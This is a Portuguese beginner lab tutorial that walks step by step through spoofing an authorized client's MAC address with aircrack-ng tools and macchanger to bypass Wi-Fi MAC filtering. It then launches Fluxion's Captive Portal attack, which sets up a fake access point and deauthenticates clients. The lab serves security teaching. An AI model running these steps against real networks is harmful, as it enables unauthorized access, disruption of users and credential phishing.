Contornar Filtragem de Endereço MAC Durante um Ataque

Beginner
Pratique Agora

Introdução

O filtragem de endereços MAC (Media Access Control) é uma medida de segurança de rede onde um roteador ou ponto de acesso (AP) é configurado para aceitar tráfego apenas de dispositivos com endereços MAC específicos e pré-aprovados. Embora possa dissuadir intrusos casuais, esta camada de segurança pode ser contornada através de uma técnica chamada MAC spoofing.

Neste laboratório, você aprenderá o processo completo de contornar a filtragem de endereços MAC. Primeiro, você identificará uma rede alvo, encontrará o endereço MAC de um cliente já autorizado e, em seguida, alterará o endereço MAC do seu próprio adaptador sem fio para se passar por esse cliente. Finalmente, você verá como isso permite que uma ferramenta como o Fluxion inicie com sucesso um ataque que, de outra forma, seria bloqueado. Este laboratório tem fins educacionais para ajudá-lo a entender as vulnerabilidades de rede.

Identificar uma Rede Potencialmente Usando Filtragem MAC

Nesta etapa, você instalará as ferramentas necessárias e fará uma varredura de redes sem fio próximas. A primeira parte de qualquer avaliação sem fio é a reconhecimento. Precisamos ver quais redes estão disponíveis e escolher um alvo.

Primeiro, vamos atualizar a lista de pacotes e instalar o conjunto aircrack-ng, que contém as ferramentas que precisamos para a varredura.

sudo apt-get update
sudo apt-get install -y aircrack-ng

Em seguida, você precisa colocar seu adaptador sem fio em "modo monitor". Este modo permite que o adaptador capture todo o tráfego Wi-Fi no ar, não apenas o tráfego destinado a ele. Neste ambiente simulado, seu adaptador sem fio é nomeado wlan0.

Execute o seguinte comando para iniciar o modo monitor:

sudo airmon-ng start wlan0

Você deverá ver uma saída indicando que o modo monitor foi ativado. O comando também criará uma nova interface virtual, tipicamente nomeada wlan0mon.

PHY     Interface       Driver          Chipset

phy0    wlan0           iwlwifi         Intel Corporation Wireless
        (monitor mode enabled on wlan0mon)

Agora, use airodump-ng com a nova interface monitor (wlan0mon) para escanear todas as redes sem fio ao alcance.

sudo airodump-ng wlan0mon

Deixe a varredura rodar por um minuto. Você verá uma lista de pontos de acesso detectados. Para este laboratório, assumiremos que nossa rede alvo tem o ESSID (nome da rede) "Target-Net". Pressione Ctrl+C para parar a varredura assim que a vir.

 CH  6 ][ Elapsed: 10 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -30       10        0    0   6  54e  WPA2 CCMP   PSK  Target-Net
 F8:E4:3B:9A:1B:C0  -65        8        0    0   1  54e  WPA2 CCMP   PSK  Other-Net

Desta saída, anote o BSSID (00:11:22:33:44:55) e o CH (canal 6) da nossa "Target-Net". Precisaremos dessas informações na próxima etapa.

Usar 'airodump-ng' para Encontrar o Endereço MAC de um Cliente Conectado

Nesta etapa, você focará sua varredura na rede alvo para identificar quaisquer clientes que já estejam conectados. Para contornar a filtragem MAC, você precisa se passar por um dispositivo que já está na "lista de permissões". Encontrar o endereço MAC de um cliente conectado é a chave para isso.

Usando o BSSID e o channel que você identificou na etapa anterior, execute airodump-ng novamente. Desta vez, você adicionará opções para filtrar a varredura e mostrar apenas informações sobre nossa rede alvo. Isso torna a saída mais limpa e ajuda você a encontrar clientes com mais facilidade.

Substitua 00:11:22:33:44:55 pelo BSSID da sua rede alvo e 6 pelo seu canal.

sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 wlan0mon

A saída será dividida em duas partes. A parte superior mostra informações sobre o Ponto de Acesso (AP), e a parte inferior mostra os clientes conectados (estações).

 CH  6 ][ Elapsed: 25 s ][ 2023-10-27 10:32

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:11:22:33:44:55  -32  100       30       20    1   6  54e  WPA2 CCMP   PSK  Target-Net

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -40    1- 0      0       15

Olhe para a seção inferior sob STATION. Este é o endereço MAC de um cliente conectado ao AP "Target-Net". Neste exemplo, o endereço MAC do cliente é AA:BB:CC:DD:EE:FF.

Copie este endereço MAC STATION. Você o usará na próxima etapa para falsificar seu próprio endereço MAC. Assim que tiver o endereço, você pode parar a varredura pressionando Ctrl+C.

Usar 'macchanger' para Falsificar o MAC do Seu Adaptador para o MAC do Cliente

Nesta etapa, você alterará o endereço MAC do seu adaptador sem fio para o que você capturou do cliente legítimo. Este processo é chamado de falsificação de MAC (MAC spoofing).

Primeiro, você precisa instalar o macchanger, uma utilidade simples para visualizar e manipular endereços MAC.

sudo apt-get install -y macchanger

Antes de alterar o endereço MAC, você deve parar a interface em modo monitor e desativar a interface sem fio física.

sudo airmon-ng stop wlan0mon
sudo ifconfig wlan0 down

Agora, use macchanger para definir o novo endereço MAC. Use a opção -m seguida pelo endereço MAC do cliente que você anotou na etapa anterior (AA:BB:CC:DD:EE:FF).

sudo macchanger -m AA:BB:CC:DD:EE:FF wlan0

A saída mostrará o MAC original (Permanent) e confirmará o novo MAC falsificado.

Current MAC:   00:0c:29:12:34:56 (unknown)
Permanent MAC: 00:0c:29:12:34:56 (unknown)
New MAC:       AA:BB:CC:DD:EE:FF (unknown)

Finalmente, ative a interface sem fio para que as alterações entrem em vigor.

sudo ifconfig wlan0 up

Você pode verificar se o endereço MAC foi alterado executando ifconfig wlan0 e verificando o campo ether. Seu adaptador agora está se passando pelo cliente legítimo.

Lançar o Ataque Fluxion com o Endereço MAC Falsificado

Nesta etapa, você lançará uma ferramenta de ataque chamada Fluxion. O objetivo é demonstrar que, com seu endereço MAC falsificado, a ferramenta pode se associar com sucesso ao AP alvo, um passo que falharia se a rede estivesse usando filtragem MAC e você tivesse um MAC aleatório e não autorizado.

Primeiro, você precisa baixar o Fluxion de seu repositório oficial no GitHub.

git clone https://www.github.com/FluxionNetwork/fluxion.git

Navegue para o diretório fluxion recém-criado.

cd fluxion

Agora, inicie o script Fluxion com privilégios de sudo.

sudo ./fluxion.sh

Fluxion é um script interativo. Você será solicitado a fazer várias seleções. Siga estas instruções:

  1. Seleção de Idioma: Pressione Enter para selecionar Inglês (ou digite o número correspondente).
  2. Seleção do Adaptador Sem Fio: Fluxion detectará seu adaptador wlan0. Selecione-o digitando seu número e pressionando Enter.
  3. Seleção de Canal: Escolha a opção para escanear redes (por exemplo, "All channels scanner").
  4. Seleção do Alvo: Após a varredura, uma lista de redes aparecerá. Encontre "Target-Net" e digite seu número, depois pressione Enter.
  5. Seleção do Ataque: Escolha um ataque. Para esta demonstração, selecione o ataque Captive Portal.
  6. Verificação do Handshake: Fluxion verificará um arquivo de handshake válido. Escolha a opção para pular ou realizar um ataque de desautenticação para capturar um.

A parte crítica desta etapa é observar que o Fluxion pode prosseguir por essas fases iniciais. Como seu endereço MAC agora está na "lista de permissões" do AP, as tentativas do Fluxion de se comunicar e associar ao AP serão bem-sucedidas.

Verificar se o Ataque Prossegue Após a Etapa de Associação

Nesta etapa final, você observará a saída do Fluxion para confirmar que a falsificação de MAC foi bem-sucedida. Você não precisa concluir o ataque completo; o objetivo é simplesmente verificar se você contornou a verificação de segurança inicial.

Após selecionar o ataque Captive Portal no Fluxion, a ferramenta iniciará seu processo. Você deverá ver mensagens no terminal indicando que ele está:

  • Criando um Ponto de Acesso (AP) falso.
  • Tentando desautenticar clientes do AP real.
  • Aguardando um cliente se conectar ao AP falso.

A observação chave aqui é a ausência de um erro "falha na associação" (association failed). Se você tivesse tentado executar este ataque sem falsificar seu endereço MAC, o Fluxion provavelmente falharia logo no início porque o AP alvo rejeitaria quaisquer tentativas de conexão do seu endereço MAC não autorizado. O fato de o ataque prosseguir para a etapa de configuração de um AP falso e desautenticação de clientes é a prova de que você contornou com sucesso o filtro MAC.

Assim que você vir essas mensagens e confirmar que o ataque está prosseguindo, você pode parar o script com segurança pressionando Ctrl+C no terminal.

Como uma boa prática final, você deve sempre restaurar o endereço MAC original do seu adaptador após terminar.

Primeiro, desative a interface:

sudo ifconfig wlan0 down

Use macchanger com a opção -p (permanent) para restaurar o endereço MAC original de hardware.

sudo macchanger -p wlan0

Finalmente, ative a interface novamente.

sudo ifconfig wlan0 up

Você agora demonstrou com sucesso como contornar a filtragem MAC e realizou a limpeza restaurando sua configuração original.

Resumo

Neste laboratório, você aprendeu e executou com sucesso a técnica de contornar a filtragem de endereços MAC em uma rede Wi-Fi.

Você começou usando o conjunto aircrack-ng para escanear redes e identificar um alvo. Em seguida, focou nesse alvo com airodump-ng para encontrar o endereço MAC de um cliente já autorizado. Usando macchanger, você falsificou o endereço MAC do seu adaptador sem fio para se passar por esse cliente. Finalmente, você lançou a ferramenta Fluxion e verificou que o ataque poderia prosseguir além da etapa inicial de associação, provando que a medida de segurança de filtragem MAC havia sido efetivamente contornada.

Esta experiência prática demonstra uma vulnerabilidade comum em segurança de rede e destaca a importância de usar medidas de segurança mais fortes, como WPA2/WPA3 com uma senha forte, em vez de depender de identificadores facilmente falsificáveis como endereços MAC.